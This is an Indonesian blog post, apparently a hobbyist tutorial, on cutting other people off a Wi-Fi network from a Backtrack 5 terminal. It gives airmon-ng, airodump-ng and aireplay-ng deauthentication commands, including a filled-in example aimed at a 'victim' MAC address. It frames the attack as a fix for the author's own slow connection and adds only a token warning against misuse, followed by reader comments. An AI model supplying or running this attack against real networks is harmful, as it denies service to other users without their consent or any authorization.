IP

Memutuskan jaringan melalui terminal pada Backtrack 5

Bookmark and Share
Saya kesal jika sementara asik ONLINE....jaringan  tiba-tiba LOLA .Untung saja saya pengguna backtrack 5.. 
wokeh deh, perhatikan langkah saya dalam memutuskan jaringan orang lain menggunakan Backtrack..
  • Buka terminal lalu ketikkan ifconfig untuk memeriksa interface anda.
  • wlan0 adalah punya saya.Mungkin punya anda wlan1 dl
  • Aktifkan mode monitor dengan perintah :
airmon-ng start wlan0
  • Mode monitor aktif.Untuk scanning korbang, masukkan perintah :
airodump-ng mon0
  • Proses scanning seperti pada gambar
  • ctrl+C untuk menghentikan scanning.tentukan target                            (contoh 70:f1:a1:b2:72:77)
  • Langkah memutuskan jaringan korban, masukkan perintah berikut
aireplay-ng -0 jumlahpaket -a BSSID -c Macadresskorban mon0
  1. jumlah paket : lamanya pemutusan jaringan tergantung banyaknya pket
  2. untuk BSSID perhatikan hasil scan yang sensor merah
contoh(aireplay-ng -0 500 -a 11:22:33:44:55:66 -c 70:f1:a1:b2:72:77 mon0)
  •  Proses berhasil jika tampak seperti dibawah ini
 Selamat mencoba...jangan disalahgunakan

{ 3 komentar... Views All / Send Comment! }

Unknown mengatakan...

makasi ya gan buat tutorial nya... ini sangat bermanfaat bagi saya Salam dari blog komunitas anak tkj

Unknown mengatakan...

oia gan sama-sama

Anonim mengatakan...

copas http://baso-onhacker.blogspot.com/2012/06/memutuskan-jaringan-orang-lain.html

Apa alwanblog bermanfaat untuk kalian semua ?